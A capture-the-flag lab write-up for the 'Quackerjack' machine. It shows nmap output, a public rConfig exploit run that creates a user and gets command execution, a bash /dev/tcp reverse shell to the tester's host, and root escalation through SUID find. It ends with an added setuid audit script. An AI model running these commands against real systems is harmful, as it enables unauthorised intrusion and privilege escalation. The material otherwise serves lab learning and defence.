Quackerjack
Intro
This machine was running a version of the rConfig service that was vulnerable to unauthenticated user creation followed by authenticated remote command execution. After achieving initial access, privilege escalation was achieved by leveraging the SUID bit on /usr/bin/find.
Initial Foothold
We begin with a full TCP port nmap scan of the target, with service and default-script detection enabled.
# Nmap 7.94SVN scan initiated Fri Nov 1 09:28:42 2024 as: nmap -p- -sV -sC -oA nmap/fulltcp -vv quackerjack.pg
Nmap scan report for quackerjack.pg (192.168.163.57)
Host is up, received echo-reply ttl 61 (0.050s latency).
Scanned at 2024-11-01 09:28:42 CDT for 180s
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.2
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.45.234
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:ec:75:8d:86:9b:a3:0b:d3:b6:2f:64:04:f9:fd:25 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCWsUPf+lVe3JddBDNBbM3vSxW2Nbl7ZniBHSy2r7B9KN42uteBJeZtPoxcBGPEcUv4ZZQ7CrIyKEqNjpz4QfryIb9Ta4ehTJNumQCXV2r2VsLDYCK0C+FjOwc++o/iqUOPm48NNO3s//vhb33VZ1g5dnEnXQ68jdJ3G382+cVfcWj6WSZLS1hk7HLq2lYrTZD6krJ1eEZxgIb6YiXnSruEtntEpiEy5c92yh3KFnvVhgwNJe/WyNpXLrE4I66lX5EWhTAhw/6373RL/3efGsptmwhb7wrMXdscic/JOmUMUKYPRVl7KGMik0kjVH/rXpEpTjUONQ+3DhuT7khuB5MF
| 256 b6:d2:fd:bb:08:9a:35:02:7b:33:e3:72:5d:dc:64:82 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMT94WFh/L5UMkSoHb0Obh3JTETeKzHNMKfnuJleky0X/AEbM+TV5WCsd7GcWfhfsFxK1xyK9iyNzmKmShy3Fk8=
| 256 08:95:d6:60:52:17:3d:03:e4:7d:90:fd:b2:ed:44:86 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIANg5sdcd3U3DkheWc10jhSTJbOSE7Lqtyu+yQhLuywl
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
|_http-title: Apache HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.10.4 (workgroup: SAMBA)
3306/tcp open mysql syn-ack ttl 61 MariaDB (unauthorized)
8081/tcp open http syn-ack ttl 61 Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
Service Info: Host: QUACKERJACK; OS: Unix
Host script results:
|_clock-skew: mean: 1h20m02s, deviation: 2h18m37s, median: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51879/tcp): CLEAN (Timeout)
| Check 2 (port 2680/tcp): CLEAN (Timeout)
| Check 3 (port 34238/udp): CLEAN (Timeout)
| Check 4 (port 30292/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.4)
| Computer name: quackerjack
| NetBIOS computer name: QUACKERJACK\x00
| Domain name: \x00
| FQDN: quackerjack
|_ System time: 2024-11-01T10:31:07-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-11-01T14:31:03
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 1 09:31:42 2024 -- 1 IP address (1 host up) scanned in 180.53 seconds
We manually examined the HTTP services and noted that rConfig 3.9.4 was running on port 8081 (the 400 Bad Request title in the scan is Apache's reply to plain HTTP on an HTTPS port; the service is reached over https://).
Searchsploit yielded several RCE exploits for this product.
┌──(joe㉿kali)-[~]
└─$ searchsploit rConfig
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Campsite 2.6.1 - 'LocalizerConfig.php?g_documentRoot' | php/webapps/30005.txt
HMS HICP Protocol + Intellicom - 'NetBiterConfig.exe' | hardware/remote/10451.txt
Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Re | windows/dos/33403.py
rConfig - install Command Execution (Metasploit) | linux/remote/47602.rb
rConfig 3.1.1 - Local File Inclusion | php/webapps/39898.txt
rConfig 3.9 - 'searchColumn' SQL Injection | php/webapps/48208.py
rConfig 3.9.2 - Remote Code Execution | php/webapps/47555.py
rConfig 3.9.3 - Authenticated Remote Code Execution | php/webapps/47982.py
rConfig 3.9.4 - 'search.crud.php' Remote Command Injec | php/webapps/48241.py
rConfig 3.9.4 - 'searchField' Unauthenticated Root Rem | php/webapps/48261.py
rConfig 3.9.5 - Remote Code Execution (Unauthenticated | php/webapps/48878.py
rConfig 3.9.6 - 'path' Local File Inclusion (Authentic | php/webapps/49644.txt
rconfig 3.9.6 - Arbitrary File Upload | php/webapps/49783.py
rConfig 3.9.6 - Arbitrary File Upload to Remote Code E | php/webapps/49665.txt
rconfig 3.9.7 - Sql Injection (Authenticated) | php/webapps/51163.py
rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Rem | php/webapps/48207.py
Rconfig 3.x - Chained Remote Code Execution (Metasploi | linux/remote/48223.rb
------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Running exploit 48878 (written for rConfig 3.9.5; it warns that 3.9.4 may not be vulnerable, but it worked here) with the connect-back payload pointed at port 80, we caught a reverse shell running as the apache user.
┌──(joe㉿kali)-[~/hax/pg/quackerjack]
└─$ python3 48878.py
Connecting to: https://quackerjack.pg:8081/
Connect back is set to: /bin/bash -i >& /dev/tcp/192.168.45.234/80 0>&1, please launch 'nc -lv 9001'
Version is rConfig Version 3.9.4 it may not be vulnerable
Remote Code Execution + Auth bypass rConfig 3.9.5 by Daniel Monzón
In the last stage if your payload is a reverse shell, the exploit may not launch the success message, but check your netcat ;)
Note: preferred method for auth bypass is 1, because it is less 'invasive'
Note2: preferred method for RCE is 2, as it does not need you to know if, for example, netcat has been installed in the target machine
Choose method for authentication bypass:
1) User creation
2) User enumeration + User edit
Method>1
(+) User test created
Choose method for RCE:
1) Unsafe call to exec()
2) Template edit
Method>1
(+) Log in as test completed
(-) Error when executing payload, please debug the exploit
(+) Log in as test completed
(+) Payload executed successfully
┌──(joe㉿kali)-[~/hax/pg/quackerjack]
└─$ sudo nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.163.57] 60414
bash: no job control in this shell
bash-4.2$ whoami
whoami
apache
bash-4.2$
Privilege Escalation
Running linpeas, we discovered that /usr/bin/find is SUID root. GTFOBins lists this binary as one that does not drop its elevated privileges and can run additional commands through -exec. Using this, we executed /bin/sh as the root user.
bash-4.2$ ls -la /usr/bin/find
ls -la /usr/bin/find
-rwsr-xr-x. 1 root root 199304 Oct 30 2018 /usr/bin/find
bash-4.2$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
sh-4.2# whoami
whoami
root
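The fix on the defending side is to find setuid-root binaries that should not be there, such as /usr/bin/find above, and strip the bit. The following audit script is an added example, not part of the writeup; the baseline list of expected setuid binaries is a hypothetical starting point and should be adjusted to the actual build.

```shell
#!/bin/sh
# Audit helper (added example): list setuid-root executables and flag any that
# are not on an expected baseline, e.g. /usr/bin/find on this host.

# Hypothetical baseline of setuid-root binaries normally present on a CentOS 7 box.
SUID_BASELINE="passwd su sudo mount umount chsh chfn newgrp gpasswd pkexec crontab"

# Walk one filesystem and print regular files owned by root with the setuid bit set.
scan_suid_root() {
    # $1 = directory to scan; -xdev keeps the walk on a single filesystem
    find "$1" -xdev -type f -user root -perm -4000 2>/dev/null
}

# Read one path per line on stdin; print those whose basename is not in the baseline.
flag_unexpected_suid() {
    while IFS= read -r path; do
        name=${path##*/}
        allowed=0
        for known in $SUID_BASELINE; do
            [ "$name" = "$known" ] && allowed=1 && break
        done
        [ "$allowed" -eq 0 ] && printf '%s\n' "$path"
    done
    return 0
}

# Print the remediation command for a flagged path (only printed, never executed here).
remediation_for() {
    printf 'chmod u-s %s\n' "$1"
}

# Full audit of a tree: scan, classify, and print a remediation hint per finding.
audit_tree() {
    scan_suid_root "$1" | flag_unexpected_suid | while IFS= read -r p; do
        printf 'UNEXPECTED setuid-root: %s -> %s\n' "$p" "$(remediation_for "$p")"
    done
}

# Stand-alone use: AUDIT_ROOT=/ sh suid_audit.sh  (no scan runs unless AUDIT_ROOT is set)
if [ -n "${AUDIT_ROOT:-}" ]; then
    audit_tree "$AUDIT_ROOT"
fi
```

On an RPM-based host, `rpm -V findutils` gives a second opinion: an `M` in the verify flags for /usr/bin/find means its mode differs from what the package installed.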